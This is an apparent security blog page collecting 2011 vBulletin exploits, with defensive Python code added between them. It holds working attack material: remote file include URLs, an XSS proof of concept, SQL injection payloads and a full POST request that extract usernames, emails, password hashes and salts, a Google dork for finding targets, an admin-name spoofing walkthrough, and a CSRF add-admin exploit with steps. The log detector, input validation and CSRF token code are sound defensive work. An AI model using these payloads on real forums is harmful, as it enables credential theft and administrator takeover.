lo0.ro cat /dev/null > stupidity – nobody is safe

1 Nov 2011

vBulletin Multiple Remote File Include Vulnerabilities

vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

vBulletin 4.1.7 is vulnerable; other versions may also be affected.

[cc lang="html"]http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI][/cc]
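As an added detection example (not part of the advisory above): a Python script that reads web server access-log lines in combined format and flags requests that pass a remote-looking value (a URL with a scheme, a protocol-relative `//host` path, or a `data:` wrapper) into one of the include parameters listed above. The script paths and parameter names come from the advisory; the log lines, client addresses and the `/vB1` install prefix are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and the parameters reported as include sinks in the advisory above.
# PHP-style array suffixes ("api[classname]", "match[0]") are keyed by their base name.
RFI_SINKS = {
    "/api.php": {"api_script"},
    "/payment_gateway.php": {"api"},
    "/admincp/cronadmin.php": {"nextitem"},
    "/admincp/diagnostic.php": {"match", "api"},
    "/admincp/plugin.php": {"safeid"},
    "/includes/class_block.php": {"file"},
    "/includes/class_humanverify.php": {"chosenlib"},
    "/includes/class_paid_subscription.php": {"methodinfo"},
    "/includes/functions.php": {"classfile"},
    "/includes/functions_cron.php": {"nextitem"},
    "/vb/vb.php": {"filename"},
    "/install/includes/class_upgrade.php": {"chosenlib"},
    "/packages/vbattach/attach.php": {"package", "path"},
}

# Values that name a remote location or a PHP stream wrapper (generally known
# remote-include carriers, not taken from the advisory): "http://host/x",
# "//host/x", "php://input", "data:...".
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//|^data:", re.I)

# Apache/nginx combined-format line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: two include attempts, one normal class load, one
# unrelated script, and an unrelated parameter that happens to hold a URL.
LOG_LINES = [
    '203.0.113.7 - - [01/Nov/2011:10:12:31 +0000] "GET /vB1/api.php?api_script=http://198.51.100.9/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Nov/2011:10:12:35 +0000] "GET /vB1/admincp/diagnostic.php?match[0]=%2F%2F198.51.100.9%2Fs HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Nov/2011:10:13:01 +0000] "GET /vB1/includes/functions.php?classfile=class_bbcode HTTP/1.1" 200 77',
    '192.0.2.44 - - [01/Nov/2011:10:14:00 +0000] "GET /vB1/showthread.php?t=12&p=http://example.org/ HTTP/1.1" 200 9001',
]


def is_remote_value(value: str) -> bool:
    """True if the decoded parameter value points outside the local code base."""
    return bool(REMOTE_VALUE.search(value))


def _sink_params(path: str):
    """Return the include-parameter names for a request path, or None if not a sink.
    Suffix matching lets the install prefix (/vB1 here) be anything."""
    for sink, params in RFI_SINKS.items():
        if path.endswith(sink):
            return params
    return None


def find_rfi_attempts(lines):
    """Return (client_ip, script_path, parameter, decoded_value) for every request
    that feeds a remote-looking value into one of the listed include parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        params = _sink_params(parts.path)
        if params is None:
            continue
        # parse_qsl percent-decodes, so an encoded "%2F%2F" is seen as "//".
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            base = re.sub(r"\[.*\]$", "", key)
            if base in params and is_remote_value(value):
                hits.append((m.group("ip"), parts.path, key, value))
    return hits


if __name__ == "__main__":
    for ip, path, key, value in find_rfi_attempts(LOG_LINES):
        print(f"{ip} -> {path} {key}={value!r}")
```

The suffix match on the script path means the same table works whatever directory the forum is installed in, and the percent-decoding in `parse_qsl` is what makes the second sample line (an encoded `//host`) show up.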

3 Aug 2011

vBulletin Cross Site Scripting Vulnerability

Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1

PoC:

[cc lang="html"]http://www.example.com/forums/admincp/?";>[/cc]

Happy educational purpose testing! :)

21 Jul 2011

vBulletin “Search UI” SQL Injection 0-day – part II

vBulletin "Search UI" SQL Injection

PoC:

[cc lang="html"]POST /search.php?do=process HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* [/cc]

will return:

[cc lang="html"] [/cc]

21 Jul 2011

Vbulletin 4.0.x -> 4.1.3 SQL injection Vulnerability 0-day

So... after the patching done 2 months ago by the vBulletin team, here it is:

Vulnerability:
vBulletin 4.x.x => 4.1.3 suffers from an SQL injection vulnerability in the parameter "&messagegroupid" due to improper input validation.

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

[cc lang="html"]&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#[/cc]
Exact Request as follows:

Code:
[cc lang="html"]query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#[/cc]

Google dork: intitle: powered by Vbulletin 4
Author: FB1H2S
Found his blog. Awesome posts.
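Both search.php PoCs above (categoryid[] in the first post, messagegroupid[0] in the second) inject through a parameter that the search form only ever submits as a list of numeric ids. As an added example, not code from vBulletin or from either post: a Python check that parses the form-encoded body, rejects id-list values that are not plain integers, and builds the IN (...) clause with bound placeholders so the ids never become query text. The sample bodies are shortened from the PoCs above; the parameter names are the page's.

```python
import re
from urllib.parse import parse_qsl

# Parameters that the search form submits as lists of numeric ids. Both PoCs
# above go through one of these; accepting only digits closes both.
ID_LIST_PARAM = re.compile(r"^(categoryid|messagegroupid)\[\d*\]$")
DIGITS = re.compile(r"^\d+$")

# Constructed sample bodies: a normal two-group search and the two PoC shapes,
# shortened from the requests shown above.
BENIGN_BODY = "do=process&contenttypeid=5&messagegroupid[0]=3&messagegroupid[1]=7"
POC_CATEGORYID = (
    "humanverify[]=&do=process&contenttypeid=5"
    "&categoryid[]=-99) union select password from user -- /*"
)
POC_MESSAGEGROUPID = (
    "searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5"
    "&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,password) FROM user WHERE userid=1#"
)


def check_search_body(body: str):
    """Parse an application/x-www-form-urlencoded search.php body and return the
    (parameter, value) pairs whose id-list value is not a plain integer."""
    bad = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if ID_LIST_PARAM.match(key) and not DIGITS.match(value):
            bad.append((key, value))
    return bad


def id_list(body: str, name: str):
    """Collect the validated integer ids submitted for one list parameter
    (name[0], name[1], ... or name[]); raise on anything that is not an integer."""
    ids = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.startswith(name + "[") and key.endswith("]"):
            if not DIGITS.match(value):
                raise ValueError(f"{key}: expected an integer id, got {value!r}")
            ids.append(int(value))
    return ids


def in_clause(column: str, ids):
    """Build a parameterised 'column IN (%s, %s)' fragment plus its bound values.
    The ids travel as parameters, so even a value that slipped past validation
    could not change the statement."""
    ids = [int(i) for i in ids]
    if not ids:
        raise ValueError("empty id list")
    placeholders = ", ".join(["%s"] * len(ids))
    return f"{column} IN ({placeholders})", ids


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("poc-1", POC_CATEGORYID), ("poc-2", POC_MESSAGEGROUPID)):
        print(label, check_search_body(body))
    print(in_clause("messagegroupid", id_list(BENIGN_BODY, "messagegroupid")))
```

Rejecting at the parameter layer is the cheap fix; the placeholder clause is the one that holds up if some other code path forgets to validate, because the driver sends the ids separately from the statement text.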

6 Jun 2011

vBulletin – Registration Bypass Vulnerability

1. Check the names of the admins/moderators on the forum

2. Go to http://[localhost]/path/register.php

3. [cc lang="html"]Type this as the User Name ===> ADMIN_username�[/cc]

4. [cc lang="html"]� is an ASCII code[/cc]

5. Complete the other parameters

6. Then click on Complete Registration

7. Now you see that your user name looks like the admin's user name

8. PM the moderators to elevate your account or promote another user (or other nutty things)

(this is old but it's still working)
Author: Immortal Boy
Iranian Datacoders Security Team
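The registration trick above appears to work because the name is compared literally, so an admin name with one extra invisible character passes the uniqueness check while displaying the same. As an added example (not vBulletin code): a Python normalisation step to run on the requested name before the uniqueness check, so the extra code point no longer makes a "new" name. The assumption is that the garbled character after ADMIN_username was a non-printing code point; U+200B is used here as the stand-in, and the existing names are constructed.

```python
import unicodedata


def normalize_username(name: str) -> str:
    """Canonical form used only for uniqueness checks (the stored display name is
    left alone): NFKC-fold compatibility forms such as fullwidth letters, drop
    control, format (zero-width) and other non-printing code points, collapse
    runs of whitespace, then casefold."""
    folded = unicodedata.normalize("NFKC", name)
    # Categories Cc, Cf, Cn, Co, Cs are the "Other" group: nothing in it renders.
    kept = "".join(ch for ch in folded if not unicodedata.category(ch).startswith("C"))
    collapsed = " ".join(kept.split())
    return collapsed.casefold()


def registration_allowed(requested: str, existing_names) -> bool:
    """True only if the requested name does not normalise to any existing name."""
    wanted = normalize_username(requested)
    if not wanted:
        return False  # a name made only of invisible characters is not a name
    taken = {normalize_username(n) for n in existing_names}
    return wanted not in taken


# Constructed examples: the existing staff names and a few registration attempts.
EXISTING = {"Admin", "Moderator1"}
ATTEMPTS = [
    "Admin\u200b",   # stand-in for the appended invisible character above
    "ADMIN ",        # trailing space, different case
    "\uff21dmin",    # fullwidth A, folded by NFKC
    "admin2",        # genuinely different
]

if __name__ == "__main__":
    for attempt in ATTEMPTS:
        print(repr(attempt), "->", repr(normalize_username(attempt)),
              "allowed" if registration_allowed(attempt, EXISTING) else "rejected")
```

This catches invisible and compatibility-form variants; look-alike letters from other scripts (a Cyrillic "а" in place of a Latin "a") survive NFKC and need a separate confusables table, which is out of scope here.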

31 May 2011

vbulletin 4.X.X Add Admin XSRF Exploit

#Title : vb 4.X.X Add Admin XSRF Exploit
#Author : Mon7rF
#Mail : x0h@msn.com
#Date : 2011 - 6 - 29

---------------------------------------------[Exploit]-----------------------------------------------

User Name :   Password : e-Mail :

---------------------------------------------[The End]-----------------------------------------------
Important notices:
Modify the adminhash in the code.
How?
1- Go to http://localhost/vb/admincp
2- View the page source
3- Search for var ADMINHASH, then copy it --- http://store3.up-00.com/May11/6q673901.png
4- Paste it in place of "hash is here !" --- http://store3.up-00.com/May11/8AO73901.png

Greets : RENO - ArHabY-HacKeR - FoX HaCkEr - Hamoud-Oz - All p0c.cc members

source
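The add-admin page above is a cross-site request: a page under the attacker's control submits the admincp user form from a logged-in administrator's browser, and the form carries an ADMINHASH value the author says to copy from the admincp page source. A token the request author can obtain and paste into a static form is not a CSRF defence. As an added example, not vBulletin code: a Python implementation of the defending side, an HMAC token bound to the session and the action with an expiry, checked in constant time, plus a same-origin check on the Origin/Referer header. The secret, session id and origins are constructed; the `user:add` action name is an assumed label.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlsplit

# Per-deployment secret; generated here for the example, kept server-side in practice.
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session_id: str, action: str, now=None) -> str:
    """Token = timestamp + HMAC(secret, session | action | timestamp). It is tied to
    one session and one admin action, so it cannot be lifted from another page or
    reused for a different operation."""
    ts = int(now if now is not None else time.time())
    msg = f"{session_id}|{action}|{ts}".encode()
    mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_token(token: str, session_id: str, action: str, now=None, max_age=3600) -> bool:
    """Recompute the MAC for this session/action and compare in constant time;
    reject tokens older than max_age seconds or dated in the future."""
    try:
        ts_str, mac = token.split(".", 1)
        ts = int(ts_str)
    except ValueError:
        return False
    current = int(now if now is not None else time.time())
    if ts > current or current - ts > max_age:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}|{action}|{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def same_origin(headers: dict, site_origin: str) -> bool:
    """A form auto-submitted from an attacker's page arrives with that page's
    Origin (or Referer); a state-changing admin request from anywhere else is refused.
    A request with neither header is refused too, rather than guessed at."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        p = urlsplit(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin.lower() == site_origin.lower()


def admin_action_allowed(headers: dict, form: dict, session_id: str, action: str,
                         site_origin: str, now=None) -> bool:
    """Both checks must pass before the admincp handler touches the user table."""
    return same_origin(headers, site_origin) and verify_token(
        form.get("csrf_token", ""), session_id, action, now
    )


if __name__ == "__main__":
    # Constructed walk-through: the legitimate admin page gets a token, a cross-site
    # form submission with the same token is still refused.
    tok = issue_token("sess-1", "user:add")
    own = {"Origin": "https://forum.example"}
    foreign = {"Origin": "https://attacker.example"}
    print("own page  :", admin_action_allowed(own, {"csrf_token": tok}, "sess-1", "user:add", "https://forum.example"))
    print("cross-site:", admin_action_allowed(foreign, {"csrf_token": tok}, "sess-1", "user:add", "https://forum.example"))
```

The two checks fail independently: the token alone stops a form that reuses a hash from another session or action, and the origin check stops a forged request even when a valid token leaks into the attacker's page.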